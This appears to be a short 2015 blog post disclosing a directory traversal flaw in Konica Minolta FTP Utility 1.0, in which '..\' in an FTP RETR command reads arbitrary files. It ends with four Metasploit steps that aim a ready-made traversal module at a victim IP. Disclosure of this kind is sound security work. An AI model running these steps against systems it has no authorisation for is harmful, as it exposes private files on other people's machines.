Thursday, 12 November 2015

Konica Minolta FTP Utility 1.0 - Directory Traversal Vulnerability



Overview

Directory traversal vulnerability in Konica Minolta FTP Utility 1.0 allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in a RETR command.


Vulnerable software and versions

+ Configuration 1
+ OR
* cpe:/a:konicaminolta:ftp_utility:1.0

* Denotes Vulnerable Software
Changes related to vulnerability configurations  
 
 

Proof of concept :  

step 1. use auxiliary/scanner/ftp/konica_ftp_traversal

step2. set rhosts  victim IP 

step3. set verbose TRUE 

step4. run 


 

 
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)